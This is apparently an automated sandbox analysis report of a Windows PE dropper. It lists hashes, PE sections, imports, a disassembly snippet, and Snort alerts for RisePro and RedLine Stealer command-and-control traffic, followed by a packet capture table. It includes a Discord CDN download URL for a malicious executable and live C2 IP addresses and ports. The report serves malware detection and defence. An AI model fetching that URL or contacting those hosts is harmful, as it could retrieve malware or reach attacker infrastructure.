SHA-512:	67230EC3B799810F8520BC07DAB91A0374198B599F8CCF8AF9C18D83CCAA6491326DF4F23CB8EC8A6E96BDD1B4F7E894B4E0EFAC237E86B442916CF6BA8C74C7
Malicious:	false
Reputation:	unknown
Preview:	Starting....https://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.970314929827554
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	jtfCFDmLdX.exe
File size:	1'641'984 bytes
MD5:	b70f4854e1ecf7923fb88ed64198068a
SHA1:	6d2acf5525526087c1338497ce2862f385a51aa4
SHA256:	45715fffc3f6be7012dba68a9d483d8230573afb7896cec5dea7a2f24fb5608c
SHA512:	778f070d21e94285afb68dfc7bfeb191741f1d56fa7c1806621a514b60eb595054b280cd35e813fb4e0570dab58c412eda2de50fdf8aea52defb21b224d05cc6
SSDEEP:	24576:Ty/XXXHISxTnucsCsTbn2YOCJNuNrmHncoAHn+pJEE5M1YlJ0Z5xCKEb7AW:mfXo+TnxsCsb2QNgmHncoAepJYMJUxR
TLSH:	BD75239BBEE80426E8751B715CF706D32B317CD2A6B9029E7646504D09F36D8B23278F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K...N...K...H...K...O...K...J...K...J...K...C...K.......K...I...K.Rich..K.........PE..L....`.b.................d.

File Icon


Icon Hash:	3b6120282c4c5a1f

Static PE Info

General

Entrypoint:	0x406a60
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	10
OS Version Minor:	0
File Version Major:	10
File Version Minor:	0
Subsystem Version Major:	10
Subsystem Version Minor:	0
Import Hash:	646167cce332c1c252cdcb1839e0cf48

Entrypoint Preview

Instruction
call 00007F1E212AA0D5h
jmp 00007F1E212A99E5h
push 00000058h
push 004072B8h
call 00007F1E212AA177h
xor ebx, ebx
mov dword ptr [ebp-20h], ebx
lea eax, dword ptr [ebp-68h]
push eax
call dword ptr [0040A184h]
mov dword ptr [ebp-04h], ebx
mov eax, dword ptr fs:[00000018h]
mov esi, dword ptr [eax+04h]
mov edi, ebx
mov edx, 004088ACh
mov ecx, esi
xor eax, eax
lock cmpxchg dword ptr [edx], ecx
test eax, eax
je 00007F1E212A99FAh
cmp eax, esi
jne 00007F1E212A99E9h
xor esi, esi
inc esi
mov edi, esi
jmp 00007F1E212A99F2h
push 000003E8h
call dword ptr [0040A188h]
jmp 00007F1E212A99B9h
xor esi, esi
inc esi
cmp dword ptr [004088B0h], esi
jne 00007F1E212A99ECh
push 0000001Fh
call 00007F1E212A9F0Bh
pop ecx
jmp 00007F1E212A9A1Ch
cmp dword ptr [004088B0h], ebx
jne 00007F1E212A9A0Eh
mov dword ptr [004088B0h], esi
push 004010C4h
push 004010B8h
call 00007F1E212A9B36h
pop ecx
pop ecx
test eax, eax
je 00007F1E212A99F9h
mov dword ptr [ebp-04h], FFFFFFFEh
mov eax, 000000FFh
jmp 00007F1E212A9B19h
mov dword ptr [004081E4h], esi
cmp dword ptr [004088B0h], esi
jne 00007F1E212A99FDh
push 004010B4h
push 004010ACh
call 00007F1E212AA0C5h
pop ecx
pop ecx
mov dword ptr [000088B0h], 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa28c	0xb4	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc000	0x18866c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x195000	0x888	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1410	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1008	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xa000	0x288	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6314	0x6400	False	0.5744140625	data	6.314163792045976	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x8000	0x1a48	0x200	False	0.609375	data	4.970639543960129	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xa000	0x1052	0x1200	False	0.4140625	data	5.025949912909207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xc000	0x189000	0x188800	False	0.981155453821656	data	7.980138727600762	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x195000	0x888	0xa00	False	0.746484375	data	6.222637930812128	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
AVI	0xc9f8	0x2e1a	RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp	English	United States	0.2713099474665311
RT_ICON	0xf814	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.3225609756097561
RT_ICON	0xfe7c	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.41263440860215056
RT_ICON	0x10164	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 288	English	United States	0.4569672131147541
RT_ICON	0x1034c	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.5574324324324325
RT_ICON	0x10474	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.6223347547974414
RT_ICON	0x1131c	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.7369133574007221
RT_ICON	0x11bc4	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	English	United States	0.783410138248848
RT_ICON	0x1228c	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.3829479768786127
RT_ICON	0x127f4	0xd9d2	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	1.0004662673505254
RT_ICON	0x201c8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.5300829875518672
RT_ICON	0x22770	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.6137429643527205
RT_ICON	0x23818	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.703688524590164
RT_ICON	0x241a0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.425531914893617
RT_DIALOG	0x24608	0x2f2	data	English	United States	0.4389920424403183
RT_DIALOG	0x248fc	0x1b0	data	English	United States	0.5625
RT_DIALOG	0x24aac	0x166	data	English	United States	0.5223463687150838
RT_DIALOG	0x24c14	0x1c0	data	English	United States	0.5446428571428571
RT_DIALOG	0x24dd4	0x130	data	English	United States	0.5526315789473685
RT_DIALOG	0x24f04	0x120	data	English	United States	0.5763888888888888
RT_STRING	0x25024	0x8c	Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0	English	United States	0.6214285714285714
RT_STRING	0x250b0	0x520	data	English	United States	0.4032012195121951
RT_STRING	0x255d0	0x5cc	data	English	United States	0.36455525606469
RT_STRING	0x25b9c	0x4b0	data	English	United States	0.385
RT_STRING	0x2604c	0x44a	data	English	United States	0.3970856102003643
RT_STRING	0x26498	0x3ce	data	English	United States	0.36858316221765913
RT_RCDATA	0x26868	0x7	ASCII text, with no line terminators	English	United States	2.142857142857143
RT_RCDATA	0x26870	0x16d0e4	Microsoft Cabinet archive data, many, 1495268 bytes, 2 files, at 0x2c +A "TE0FN83.exe" +A "6rR8iy1.exe", ID 1773, number 1, 50 datablocks, 0x1503 compression	English	United States	1.0001840591430664
RT_RCDATA	0x193954	0x4	data	English	United States	3.0
RT_RCDATA	0x193958	0x24	data	English	United States	0.7777777777777778
RT_RCDATA	0x19397c	0x7	ASCII text, with no line terminators	English	United States	2.142857142857143
RT_RCDATA	0x193984	0x7	ASCII text, with no line terminators	English	United States	2.142857142857143
RT_RCDATA	0x19398c	0x4	data	English	United States	3.0
RT_RCDATA	0x193990	0xc	data	English	United States	1.6666666666666667
RT_RCDATA	0x19399c	0x4	data	English	United States	3.0
RT_RCDATA	0x1939a0	0xc	data	English	United States	1.6666666666666667
RT_RCDATA	0x1939ac	0x4	data	English	United States	3.0
RT_RCDATA	0x1939b0	0x4	data	English	United States	3.0
RT_RCDATA	0x1939b4	0x7	ASCII text, with no line terminators	English	United States	2.142857142857143
RT_RCDATA	0x1939bc	0x7	ASCII text, with no line terminators	English	United States	2.142857142857143
RT_GROUP_ICON	0x1939c4	0xbc	data	English	United States	0.6117021276595744
RT_VERSION	0x193a80	0x408	data	English	United States	0.42441860465116277
RT_MANIFEST	0x193e88	0x7e2	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3761149653121903

Imports

DLL	Import
ADVAPI32.dll	GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll	_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
GDI32.dll	GetDeviceCaps
USER32.dll	SetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
msvcrt.dll	_controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
COMCTL32.dll
Cabinet.dll
VERSION.dll	GetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.4194.49.94.15249729505002046269 11/18/23-10:02:03.065260	TCP	2046269	ET TROJAN [ANY.RUN] RisePro TCP v.0.x (Activity)	49729	50500	192.168.2.4	194.49.94.152
194.49.94.152192.168.2.450500497292046267 11/18/23-10:01:57.666986	TCP	2046267	ET TROJAN [ANY.RUN] RisePro TCP v.0.x (External IP)	50500	49729	194.49.94.152	192.168.2.4
194.49.94.152192.168.2.450500497292046266 11/18/23-10:01:57.356987	TCP	2046266	ET TROJAN [ANY.RUN] RisePro TCP v.0.x (Token)	50500	49729	194.49.94.152	192.168.2.4
192.168.2.4194.169.175.23549738426912043231 11/18/23-10:02:36.148848	TCP	2043231	ET TROJAN Redline Stealer TCP CnC Activity	49738	42691	192.168.2.4	194.169.175.235
194.49.94.152192.168.2.419053497302043234 11/18/23-10:01:58.165377	TCP	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	19053	49730	194.49.94.152	192.168.2.4
194.169.175.235192.168.2.442691497382043234 11/18/23-10:02:27.168741	TCP	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	42691	49738	194.169.175.235	192.168.2.4
192.168.2.4194.169.175.23549738426912046045 11/18/23-10:02:26.869964	TCP	2046045	ET TROJAN [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization)	49738	42691	192.168.2.4	194.169.175.235
194.169.175.235192.168.2.442691497382046056 11/18/23-10:02:33.744857	TCP	2046056	ET TROJAN Redline Stealer Activity (Response)	42691	49738	194.169.175.235	192.168.2.4
192.168.2.4194.49.94.15249729505002049060 11/18/23-10:01:57.474369	TCP	2049060	ET TROJAN Suspected RisePro TCP Heartbeat Packet	49729	50500	192.168.2.4	194.49.94.152
192.168.2.4194.49.94.15249730190532043231 11/18/23-10:02:12.130260	TCP	2043231	ET TROJAN Redline Stealer TCP CnC Activity	49730	19053	192.168.2.4	194.49.94.152
192.168.2.4194.49.94.15249730190532046045 11/18/23-10:01:57.866628	TCP	2046045	ET TROJAN [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization)	49730	19053	192.168.2.4	194.49.94.152

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 18, 2023 10:01:56.762711048 CET	49729	50500	192.168.2.4	194.49.94.152
Nov 18, 2023 10:01:57.059570074 CET	50500	49729	194.49.94.152	192.168.2.4
Nov 18, 2023 10:01:57.059679031 CET	49729	50500	192.168.2.4	194.49.94.152
Nov 18, 2023 10:01:57.072594881 CET	49729	50500	192.168.2.4	194.49.94.152
Nov 18, 2023 10:01:57.206656933 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:01:57.356987000 CET	50500	49729	194.49.94.152	192.168.2.4
Nov 18, 2023 10:01:57.370038033 CET	50500	49729	194.49.94.152	192.168.2.4
Nov 18, 2023 10:01:57.370229959 CET	49729	50500	192.168.2.4	194.49.94.152
Nov 18, 2023 10:01:57.474369049 CET	49729	50500	192.168.2.4	194.49.94.152
Nov 18, 2023 10:01:57.504157066 CET	19053	49730	194.49.94.152	192.168.2.4
Nov 18, 2023 10:01:57.504260063 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:01:57.515340090 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:01:57.666985989 CET	50500	49729	194.49.94.152	192.168.2.4
Nov 18, 2023 10:01:57.716809034 CET	49729	50500	192.168.2.4	194.49.94.152
Nov 18, 2023 10:01:57.813204050 CET	19053	49730	194.49.94.152	192.168.2.4
Nov 18, 2023 10:01:57.835391045 CET	50500	49729	194.49.94.152	192.168.2.4
Nov 18, 2023 10:01:57.864882946 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:01:57.866627932 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:01:57.926508904 CET	49731	443	192.168.2.4	34.117.59.81
Nov 18, 2023 10:01:57.926553011 CET	443	49731	34.117.59.81	192.168.2.4
Nov 18, 2023 10:01:57.926621914 CET	49731	443	192.168.2.4	34.117.59.81
Nov 18, 2023 10:01:57.931857109 CET	49731	443	192.168.2.4	34.117.59.81
Nov 18, 2023 10:01:57.931874037 CET	443	49731	34.117.59.81	192.168.2.4
Nov 18, 2023 10:01:58.165376902 CET	19053	49730	194.49.94.152	192.168.2.4
Nov 18, 2023 10:01:58.208621025 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:01:58.248286009 CET	443	49731	34.117.59.81	192.168.2.4
Nov 18, 2023 10:01:58.248389959 CET	49731	443	192.168.2.4	34.117.59.81
Nov 18, 2023 10:01:58.251825094 CET	49731	443	192.168.2.4	34.117.59.81
Nov 18, 2023 10:01:58.251835108 CET	443	49731	34.117.59.81	192.168.2.4
Nov 18, 2023 10:01:58.252047062 CET	443	49731	34.117.59.81	192.168.2.4
Nov 18, 2023 10:01:58.302366018 CET	49731	443	192.168.2.4	34.117.59.81
Nov 18, 2023 10:01:58.362323999 CET	49731	443	192.168.2.4	34.117.59.81
Nov 18, 2023 10:01:58.409295082 CET	443	49731	34.117.59.81	192.168.2.4
Nov 18, 2023 10:01:58.600569963 CET	443	49731	34.117.59.81	192.168.2.4
Nov 18, 2023 10:01:58.600678921 CET	443	49731	34.117.59.81	192.168.2.4
Nov 18, 2023 10:01:58.600748062 CET	49731	443	192.168.2.4	34.117.59.81
Nov 18, 2023 10:01:58.606476068 CET	49731	443	192.168.2.4	34.117.59.81
Nov 18, 2023 10:01:58.606497049 CET	443	49731	34.117.59.81	192.168.2.4
Nov 18, 2023 10:01:58.606527090 CET	49731	443	192.168.2.4	34.117.59.81
Nov 18, 2023 10:01:58.606533051 CET	443	49731	34.117.59.81	192.168.2.4
Nov 18, 2023 10:01:58.607192993 CET	49729	50500	192.168.2.4	194.49.94.152
Nov 18, 2023 10:01:58.915558100 CET	50500	49729	194.49.94.152	192.168.2.4
Nov 18, 2023 10:01:58.927531004 CET	49729	50500	192.168.2.4	194.49.94.152
Nov 18, 2023 10:01:59.228701115 CET	50500	49729	194.49.94.152	192.168.2.4
Nov 18, 2023 10:01:59.255563974 CET	49729	50500	192.168.2.4	194.49.94.152
Nov 18, 2023 10:01:59.556819916 CET	50500	49729	194.49.94.152	192.168.2.4
Nov 18, 2023 10:01:59.583687067 CET	49729	50500	192.168.2.4	194.49.94.152
Nov 18, 2023 10:01:59.884708881 CET	50500	49729	194.49.94.152	192.168.2.4
Nov 18, 2023 10:01:59.927624941 CET	49729	50500	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:03.065259933 CET	49729	50500	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:03.230932951 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:03.367082119 CET	50500	49729	194.49.94.152	192.168.2.4
Nov 18, 2023 10:02:03.411775112 CET	49729	50500	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:03.531713009 CET	19053	49730	194.49.94.152	192.168.2.4
Nov 18, 2023 10:02:03.531733036 CET	19053	49730	194.49.94.152	192.168.2.4
Nov 18, 2023 10:02:03.531743050 CET	19053	49730	194.49.94.152	192.168.2.4
Nov 18, 2023 10:02:03.531807899 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:03.583648920 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:03.760802031 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:04.059248924 CET	19053	49730	194.49.94.152	192.168.2.4
Nov 18, 2023 10:02:04.062042952 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:04.359999895 CET	19053	49730	194.49.94.152	192.168.2.4
Nov 18, 2023 10:02:04.365225077 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:04.664412022 CET	19053	49730	194.49.94.152	192.168.2.4
Nov 18, 2023 10:02:04.667529106 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:04.966270924 CET	19053	49730	194.49.94.152	192.168.2.4
Nov 18, 2023 10:02:05.021109104 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:05.631417036 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:05.931086063 CET	19053	49730	194.49.94.152	192.168.2.4
Nov 18, 2023 10:02:05.941889048 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:06.239725113 CET	19053	49730	194.49.94.152	192.168.2.4
Nov 18, 2023 10:02:06.286817074 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:06.315216064 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:06.619781971 CET	19053	49730	194.49.94.152	192.168.2.4
Nov 18, 2023 10:02:06.661809921 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:07.012531042 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:07.309937000 CET	19053	49730	194.49.94.152	192.168.2.4
Nov 18, 2023 10:02:07.310506105 CET	19053	49730	194.49.94.152	192.168.2.4
Nov 18, 2023 10:02:07.350555897 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:07.648513079 CET	19053	49730	194.49.94.152	192.168.2.4
Nov 18, 2023 10:02:07.650345087 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:07.948695898 CET	19053	49730	194.49.94.152	192.168.2.4
Nov 18, 2023 10:02:07.952475071 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:08.251161098 CET	19053	49730	194.49.94.152	192.168.2.4
Nov 18, 2023 10:02:08.252229929 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:08.550316095 CET	19053	49730	194.49.94.152	192.168.2.4
Nov 18, 2023 10:02:08.599230051 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:08.605690956 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:08.903448105 CET	19053	49730	194.49.94.152	192.168.2.4
Nov 18, 2023 10:02:08.958750963 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:08.999413013 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:09.297213078 CET	19053	49730	194.49.94.152	192.168.2.4
Nov 18, 2023 10:02:09.297231913 CET	19053	49730	194.49.94.152	192.168.2.4
Nov 18, 2023 10:02:09.297297955 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:09.594834089 CET	19053	49730	194.49.94.152	192.168.2.4
Nov 18, 2023 10:02:09.596240044 CET	19053	49730	194.49.94.152	192.168.2.4
Nov 18, 2023 10:02:09.646097898 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:11.513324022 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:11.812333107 CET	19053	49730	194.49.94.152	192.168.2.4
Nov 18, 2023 10:02:11.831459045 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:12.129334927 CET	19053	49730	194.49.94.152	192.168.2.4
Nov 18, 2023 10:02:12.130259991 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:12.429297924 CET	19053	49730	194.49.94.152	192.168.2.4
Nov 18, 2023 10:02:12.505445957 CET	49730	19053	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:23.088439941 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:23.388812065 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:23.388899088 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:23.389257908 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:23.389302969 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:23.694066048 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:23.694088936 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:23.699565887 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:23.702423096 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:23.702471972 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:23.998778105 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:23.998809099 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:24.004362106 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:24.004383087 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:24.004403114 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:24.004431009 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:24.004472971 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:24.004491091 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:24.004508972 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:24.004513979 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:24.004527092 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:24.004543066 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:24.004560947 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:24.004565954 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:24.004579067 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:24.004591942 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:24.004623890 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:24.300873041 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:24.300904036 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:24.300924063 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:24.300934076 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:24.300965071 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:24.300970078 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:24.300982952 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:24.300998926 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:24.301007986 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:24.301016092 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:24.301024914 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:24.301034927 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:24.301052094 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:24.301059961 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:24.301068068 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:24.301085949 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:24.301115036 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:24.301131010 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:24.301146984 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:24.301153898 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:24.301163912 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:24.301181078 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:24.301197052 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:24.301198006 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:24.301220894 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:24.301222086 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:24.301239967 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:24.301265955 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:24.301276922 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:24.301312923 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:24.600048065 CET	80	49737	194.49.94.210	192.168.2.4
